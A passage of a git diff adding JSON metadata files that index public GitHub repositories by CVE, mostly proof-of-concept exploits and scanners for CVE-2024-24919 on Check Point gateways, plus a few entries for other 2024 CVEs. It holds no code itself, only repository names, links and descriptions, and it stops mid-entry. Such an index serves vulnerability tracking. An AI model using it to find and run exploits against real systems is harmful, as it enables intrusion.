+ "created_at": "2024-06-01T09:54:13Z",
+ "updated_at": "2024-06-01T10:07:55Z",
+ "pushed_at": "2024-06-01T10:07:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 808982882,
+ "name": "CVE-2024-24919-Bulk-Scanner",
+ "full_name": "ifconfig-me\/CVE-2024-24919-Bulk-Scanner",
+ "owner": {
+ "login": "ifconfig-me",
+ "id": 25315805,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25315805?v=4",
+ "html_url": "https:\/\/github.com\/ifconfig-me"
+ },
+ "html_url": "https:\/\/github.com\/ifconfig-me\/CVE-2024-24919-Bulk-Scanner",
+ "description": "CVE-2024-24919 [Check Point Security Gateway Information Disclosure]",
+ "fork": false,
+ "created_at": "2024-06-01T10:51:14Z",
+ "updated_at": "2024-06-10T04:53:59Z",
+ "pushed_at": "2024-06-02T06:36:57Z",
+ "stargazers_count": 27,
+ "watchers_count": 27,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 27,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 809000136,
+ "name": "CVE-2024-24919-Checkpoint-Firewall-VPN-Check",
+ "full_name": "r4p3c4\/CVE-2024-24919-Checkpoint-Firewall-VPN-Check",
+ "owner": {
+ "login": "r4p3c4",
+ "id": 111358086,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111358086?v=4",
+ "html_url": "https:\/\/github.com\/r4p3c4"
+ },
+ "html_url": "https:\/\/github.com\/r4p3c4\/CVE-2024-24919-Checkpoint-Firewall-VPN-Check",
+ "description": "Esta herramienta se utiliza para validar la vulnerabilidad CVE-2024-24919 en las VPN de Checkpoint Firewall",
+ "fork": false,
+ "created_at": "2024-06-01T11:54:39Z",
+ "updated_at": "2024-06-01T11:59:15Z",
+ "pushed_at": "2024-06-01T11:56:27Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 809002220,
+ "name": "CVE-2024-24919-Exploit-PoC-Checkpoint-Firewall-VPN",
+ "full_name": "r4p3c4\/CVE-2024-24919-Exploit-PoC-Checkpoint-Firewall-VPN",
+ "owner": {
+ "login": "r4p3c4",
+ "id": 111358086,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111358086?v=4",
+ "html_url": "https:\/\/github.com\/r4p3c4"
+ },
+ "html_url": "https:\/\/github.com\/r4p3c4\/CVE-2024-24919-Exploit-PoC-Checkpoint-Firewall-VPN",
+ "description": "Herramienta de explotación para explotar la vulnerabilidad CVE-2024-24919 en las VPN de Checkpoint Firewall",
+ "fork": false,
+ "created_at": "2024-06-01T12:02:43Z",
+ "updated_at": "2024-06-03T19:27:04Z",
+ "pushed_at": "2024-06-01T12:20:54Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 809246469,
+ "name": "CVE-2024-24919-CHECKPOINT",
+ "full_name": "J4F9S5D2Q7\/CVE-2024-24919-CHECKPOINT",
+ "owner": {
+ "login": "J4F9S5D2Q7",
+ "id": 171471588,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171471588?v=4",
+ "html_url": "https:\/\/github.com\/J4F9S5D2Q7"
+ },
+ "html_url": "https:\/\/github.com\/J4F9S5D2Q7\/CVE-2024-24919-CHECKPOINT",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-02T06:17:06Z",
+ "updated_at": "2024-06-09T22:34:29Z",
+ "pushed_at": "2024-06-02T07:19:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 809275692,
+ "name": "CVE-2024-24919-Exploit",
+ "full_name": "mr-kasim-mehar\/CVE-2024-24919-Exploit",
+ "owner": {
+ "login": "mr-kasim-mehar",
+ "id": 136003436,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136003436?v=4",
+ "html_url": "https:\/\/github.com\/mr-kasim-mehar"
+ },
+ "html_url": "https:\/\/github.com\/mr-kasim-mehar\/CVE-2024-24919-Exploit",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-02T08:19:50Z",
+ "updated_at": "2024-06-02T15:37:49Z",
+ "pushed_at": "2024-06-02T08:24:32Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 809355149,
+ "name": "CVE-2024-24919-POC",
+ "full_name": "B1naryo\/CVE-2024-24919-POC",
+ "owner": {
+ "login": "B1naryo",
+ "id": 16160577,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16160577?v=4",
+ "html_url": "https:\/\/github.com\/B1naryo"
+ },
+ "html_url": "https:\/\/github.com\/B1naryo\/CVE-2024-24919-POC",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-02T13:09:51Z",
+ "updated_at": "2024-06-02T13:18:27Z",
+ "pushed_at": "2024-06-02T13:18:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 809370211,
+ "name": "CVE-2024-24919---Poc",
+ "full_name": "Expl0itD0g\/CVE-2024-24919---Poc",
+ "owner": {
+ "login": "Expl0itD0g",
+ "id": 170868461,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170868461?v=4",
+ "html_url": "https:\/\/github.com\/Expl0itD0g"
+ },
+ "html_url": "https:\/\/github.com\/Expl0itD0g\/CVE-2024-24919---Poc",
+ "description": "a Proof of Concept of CVE-2024-24919",
+ "fork": false,
+ "created_at": "2024-06-02T13:58:36Z",
+ "updated_at": "2024-06-03T19:58:18Z",
+ "pushed_at": "2024-06-02T14:00:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 809483907,
+ "name": "CVE-2024-24919-Sniper",
+ "full_name": "bigb0x\/CVE-2024-24919-Sniper",
+ "owner": {
+ "login": "bigb0x",
+ "id": 13532434,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4",
+ "html_url": "https:\/\/github.com\/bigb0x"
+ },
+ "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-24919-Sniper",
+ "description": "CVE-2024-24919 Sniper - A powerful tool for scanning Check Point Security Gateway CVE-2024-24919 vulnerability. Supports single & bulk scanning, multithreading, and generates detailed CSV reports. Ideal for penetration testers and security researchers.",
+ "fork": false,
+ "created_at": "2024-06-02T20:16:22Z",
+ "updated_at": "2024-06-03T23:56:17Z",
+ "pushed_at": "2024-06-02T23:00:22Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 809679765,
+ "name": "cve-2024-24919-checker",
+ "full_name": "birdlex\/cve-2024-24919-checker",
+ "owner": {
+ "login": "birdlex",
+ "id": 3228984,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3228984?v=4",
+ "html_url": "https:\/\/github.com\/birdlex"
+ },
+ "html_url": "https:\/\/github.com\/birdlex\/cve-2024-24919-checker",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-03T08:39:09Z",
+ "updated_at": "2024-06-04T06:54:59Z",
+ "pushed_at": "2024-06-04T06:54:55Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 809769497,
+ "name": "CVE-2024-24919-Exploit",
+ "full_name": "Rug4lo\/CVE-2024-24919-Exploit",
+ "owner": {
+ "login": "Rug4lo",
+ "id": 123998963,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123998963?v=4",
+ "html_url": "https:\/\/github.com\/Rug4lo"
+ },
+ "html_url": "https:\/\/github.com\/Rug4lo\/CVE-2024-24919-Exploit",
+ "description": " CVE-2024-24919 Exploit and PoC - Critical LFI for Remote Access VPN or Mobile Access.",
+ "fork": false,
+ "created_at": "2024-06-03T12:18:35Z",
+ "updated_at": "2024-06-24T12:34:39Z",
+ "pushed_at": "2024-06-03T14:09:22Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2024-24919"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 809802562,
+ "name": "CVE-2024-24919-PoC",
+ "full_name": "0nin0hanz0\/CVE-2024-24919-PoC",
+ "owner": {
+ "login": "0nin0hanz0",
+ "id": 154326653,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154326653?v=4",
+ "html_url": "https:\/\/github.com\/0nin0hanz0"
+ },
+ "html_url": "https:\/\/github.com\/0nin0hanz0\/CVE-2024-24919-PoC",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-03T13:30:31Z",
+ "updated_at": "2024-06-17T12:19:35Z",
+ "pushed_at": "2024-06-17T12:19:32Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 809932050,
+ "name": "CVE-2024-24919",
+ "full_name": "GuayoyoCyber\/CVE-2024-24919",
+ "owner": {
+ "login": "GuayoyoCyber",
+ "id": 17362318,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17362318?v=4",
+ "html_url": "https:\/\/github.com\/GuayoyoCyber"
+ },
+ "html_url": "https:\/\/github.com\/GuayoyoCyber\/CVE-2024-24919",
+ "description": "Nmap script to check vulnerability CVE-2024-24919",
+ "fork": false,
+ "created_at": "2024-06-03T18:17:45Z",
+ "updated_at": "2024-06-09T03:07:50Z",
+ "pushed_at": "2024-06-04T01:38:40Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2024-24919",
+ "nmap",
+ "nmap-scripts"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 810087759,
+ "name": "CVE-2024-24919",
+ "full_name": "0xans\/CVE-2024-24919",
+ "owner": {
+ "login": "0xans",
+ "id": 151745138,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151745138?v=4",
+ "html_url": "https:\/\/github.com\/0xans"
+ },
+ "html_url": "https:\/\/github.com\/0xans\/CVE-2024-24919",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-04T02:53:22Z",
+ "updated_at": "2024-06-19T16:59:45Z",
+ "pushed_at": "2024-06-19T16:59:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 810112875,
+ "name": "CVE-2024-24919",
+ "full_name": "Tim-Hoekstra\/CVE-2024-24919",
+ "owner": {
+ "login": "Tim-Hoekstra",
+ "id": 135951177,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/135951177?v=4",
+ "html_url": "https:\/\/github.com\/Tim-Hoekstra"
+ },
+ "html_url": "https:\/\/github.com\/Tim-Hoekstra\/CVE-2024-24919",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-04T04:29:35Z",
+ "updated_at": "2024-06-04T04:58:59Z",
+ "pushed_at": "2024-06-04T04:58:56Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 811447878,
+ "name": "CVE-2024-24919-POC",
+ "full_name": "starlox0\/CVE-2024-24919-POC",
+ "owner": {
+ "login": "starlox0",
+ "id": 144545235,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144545235?v=4",
+ "html_url": "https:\/\/github.com\/starlox0"
+ },
+ "html_url": "https:\/\/github.com\/starlox0\/CVE-2024-24919-POC",
+ "description": "A Simple Exploit Code(POC) to Automate CVE-2024–24919",
+ "fork": false,
+ "created_at": "2024-06-06T16:03:35Z",
+ "updated_at": "2024-06-06T16:15:06Z",
+ "pushed_at": "2024-06-06T16:12:42Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 811842021,
+ "name": "CVE-2024-24919-Exploit",
+ "full_name": "nullcult\/CVE-2024-24919-Exploit",
+ "owner": {
+ "login": "nullcult",
+ "id": 63312212,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63312212?v=4",
+ "html_url": "https:\/\/github.com\/nullcult"
+ },
+ "html_url": "https:\/\/github.com\/nullcult\/CVE-2024-24919-Exploit",
+ "description": "CVE-2024-24919 exploit that checks more files for better visibility",
+ "fork": false,
+ "created_at": "2024-06-07T12:14:19Z",
+ "updated_at": "2024-06-07T12:25:37Z",
+ "pushed_at": "2024-06-07T12:25:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 812235899,
+ "name": "cve-2024-24919",
+ "full_name": "satchhacker\/cve-2024-24919",
+ "owner": {
+ "login": "satchhacker",
+ "id": 171741472,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171741472?v=4",
+ "html_url": "https:\/\/github.com\/satchhacker"
+ },
+ "html_url": "https:\/\/github.com\/satchhacker\/cve-2024-24919",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-08T10:17:00Z",
+ "updated_at": "2024-06-08T10:26:37Z",
+ "pushed_at": "2024-06-08T10:26:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 812532137,
+ "name": "CVE-2024-24919",
+ "full_name": "verylazytech\/CVE-2024-24919",
+ "owner": {
+ "login": "verylazytech",
+ "id": 172168670,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172168670?v=4",
+ "html_url": "https:\/\/github.com\/verylazytech"
+ },
+ "html_url": "https:\/\/github.com\/verylazytech\/CVE-2024-24919",
+ "description": "POC - CVE-2024–24919 - Check Point Security Gateways",
+ "fork": false,
+ "created_at": "2024-06-09T06:54:51Z",
+ "updated_at": "2024-06-14T14:41:13Z",
+ "pushed_at": "2024-06-09T08:03:16Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 812836186,
+ "name": "CVE-2024-24919",
+ "full_name": "protonnegativo\/CVE-2024-24919",
+ "owner": {
+ "login": "protonnegativo",
+ "id": 64793570,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64793570?v=4",
+ "html_url": "https:\/\/github.com\/protonnegativo"
+ },
+ "html_url": "https:\/\/github.com\/protonnegativo\/CVE-2024-24919",
+ "description": "Python script to automate the process of finding vulnerable sites for CVE-2024-24919.",
+ "fork": false,
+ "created_at": "2024-06-10T01:29:19Z",
+ "updated_at": "2024-06-10T01:41:27Z",
+ "pushed_at": "2024-06-10T01:40:02Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2024-24919",
+ "cve-2024-24919-poc",
+ "python",
+ "security",
+ "security-automation",
+ "security-tools"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 813414695,
+ "name": "CVE-2024-24919",
+ "full_name": "SalehLardhi\/CVE-2024-24919",
+ "owner": {
+ "login": "SalehLardhi",
+ "id": 77610128,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77610128?v=4",
+ "html_url": "https:\/\/github.com\/SalehLardhi"
+ },
+ "html_url": "https:\/\/github.com\/SalehLardhi\/CVE-2024-24919",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-11T03:33:30Z",
+ "updated_at": "2024-06-11T03:43:24Z",
+ "pushed_at": "2024-06-11T03:37:04Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-25092.json b/2024/CVE-2024-25092.json
new file mode 100644
index 0000000000..db37f6dad6
--- /dev/null
+++ b/2024/CVE-2024-25092.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 757380747,
+ "name": "CVE-2024-25092",
+ "full_name": "RandomRobbieBF\/CVE-2024-25092",
+ "owner": {
+ "login": "RandomRobbieBF",
+ "id": 51722811,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4",
+ "html_url": "https:\/\/github.com\/RandomRobbieBF"
+ },
+ "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-25092",
+ "description": "NextMove Lite < 2.18.0 - Subscriber+ Arbitrary Plugin Installation\/Activation",
+ "fork": false,
+ "created_at": "2024-02-14T11:30:59Z",
+ "updated_at": "2024-02-14T11:32:37Z",
+ "pushed_at": "2024-02-14T11:32:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-25153.json b/2024/CVE-2024-25153.json
new file mode 100644
index 0000000000..2a7e1a51ab
--- /dev/null
+++ b/2024/CVE-2024-25153.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 771098779,
+ "name": "CVE-2024-25153",
+ "full_name": "nettitude\/CVE-2024-25153",
+ "owner": {
+ "login": "nettitude",
+ "id": 11998401,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11998401?v=4",
+ "html_url": "https:\/\/github.com\/nettitude"
+ },
+ "html_url": "https:\/\/github.com\/nettitude\/CVE-2024-25153",
+ "description": "Proof-of-concept exploit for CVE-2024-25153.",
+ "fork": false,
+ "created_at": "2024-03-12T17:26:10Z",
+ "updated_at": "2024-06-22T12:41:55Z",
+ "pushed_at": "2024-03-13T09:46:07Z",
+ "stargazers_count": 44,
+ "watchers_count": 44,
+ "has_discussions": false,
+ "forks_count": 13,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 13,
+ "watchers": 44,
+ "score": 0,
+ "subscribers_count": 5
+ },
+ {
+ "id": 773709929,
+ "name": "CVE-2024-25153",
+ "full_name": "rainbowhatrkn\/CVE-2024-25153",
+ "owner": {
+ "login": "rainbowhatrkn",
+ "id": 147452376,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/147452376?v=4",
+ "html_url": "https:\/\/github.com\/rainbowhatrkn"
+ },
+ "html_url": "https:\/\/github.com\/rainbowhatrkn\/CVE-2024-25153",
+ "description": "Proof-of-concept exploit for CVE-2024-25153.",
+ "fork": false,
+ "created_at": "2024-03-18T09:02:56Z",
+ "updated_at": "2024-03-18T09:03:33Z",
+ "pushed_at": "2024-03-18T09:09:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-25169.json b/2024/CVE-2024-25169.json
new file mode 100644
index 0000000000..d02e20a0f9
--- /dev/null
+++ b/2024/CVE-2024-25169.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 763046588,
+ "name": "CVE-2024-25169-Mezzanine-v6.0.0",
+ "full_name": "shenhav12\/CVE-2024-25169-Mezzanine-v6.0.0",
+ "owner": {
+ "login": "shenhav12",
+ "id": 93703363,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93703363?v=4",
+ "html_url": "https:\/\/github.com\/shenhav12"
+ },
+ "html_url": "https:\/\/github.com\/shenhav12\/CVE-2024-25169-Mezzanine-v6.0.0",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-25T12:21:40Z",
+ "updated_at": "2024-02-25T12:27:53Z",
+ "pushed_at": "2024-02-25T12:34:49Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-25170.json b/2024/CVE-2024-25170.json
new file mode 100644
index 0000000000..b36468dd95
--- /dev/null
+++ b/2024/CVE-2024-25170.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 763048747,
+ "name": "CVE-2024-25170-Mezzanine-v6.0.0",
+ "full_name": "shenhav12\/CVE-2024-25170-Mezzanine-v6.0.0",
+ "owner": {
+ "login": "shenhav12",
+ "id": 93703363,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93703363?v=4",
+ "html_url": "https:\/\/github.com\/shenhav12"
+ },
+ "html_url": "https:\/\/github.com\/shenhav12\/CVE-2024-25170-Mezzanine-v6.0.0",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-25T12:28:49Z",
+ "updated_at": "2024-02-25T12:28:50Z",
+ "pushed_at": "2024-02-25T12:31:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-25175.json b/2024/CVE-2024-25175.json
new file mode 100644
index 0000000000..e0ea0f1a6a
--- /dev/null
+++ b/2024/CVE-2024-25175.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 775961541,
+ "name": "CVE-2024-25175",
+ "full_name": "jet-pentest\/CVE-2024-25175",
+ "owner": {
+ "login": "jet-pentest",
+ "id": 71512502,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4",
+ "html_url": "https:\/\/github.com\/jet-pentest"
+ },
+ "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2024-25175",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-22T11:54:36Z",
+ "updated_at": "2024-03-22T11:54:36Z",
+ "pushed_at": "2024-03-22T12:01:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-25202.json b/2024/CVE-2024-25202.json
new file mode 100644
index 0000000000..dbffe46f71
--- /dev/null
+++ b/2024/CVE-2024-25202.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 760675412,
+ "name": "CVE-2024-25202",
+ "full_name": "Agampreet-Singh\/CVE-2024-25202",
+ "owner": {
+ "login": "Agampreet-Singh",
+ "id": 73707055,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73707055?v=4",
+ "html_url": "https:\/\/github.com\/Agampreet-Singh"
+ },
+ "html_url": "https:\/\/github.com\/Agampreet-Singh\/CVE-2024-25202",
+ "description": "A vulnerability was found in PHPgurukul visitor management system 1.0. it has been rated as problemic. Affected by the issue is some unknown functionality of the file search bar that called search-result.php and search-visitor.php . The vulnerability is Cross-Site-Scripting (XSS).",
+ "fork": false,
+ "created_at": "2024-02-20T18:19:53Z",
+ "updated_at": "2024-02-23T04:18:48Z",
+ "pushed_at": "2024-03-02T12:27:45Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-25227.json b/2024/CVE-2024-25227.json
new file mode 100644
index 0000000000..06e3a51683
--- /dev/null
+++ b/2024/CVE-2024-25227.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 762376764,
+ "name": "ABO.CMS-Login-SQLi-CVE-2024-25227",
+ "full_name": "thetrueartist\/ABO.CMS-Login-SQLi-CVE-2024-25227",
+ "owner": {
+ "login": "thetrueartist",
+ "id": 47917137,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47917137?v=4",
+ "html_url": "https:\/\/github.com\/thetrueartist"
+ },
+ "html_url": "https:\/\/github.com\/thetrueartist\/ABO.CMS-Login-SQLi-CVE-2024-25227",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-23T16:46:54Z",
+ "updated_at": "2024-03-13T19:47:28Z",
+ "pushed_at": "2024-03-13T19:43:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 771661416,
+ "name": "ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227",
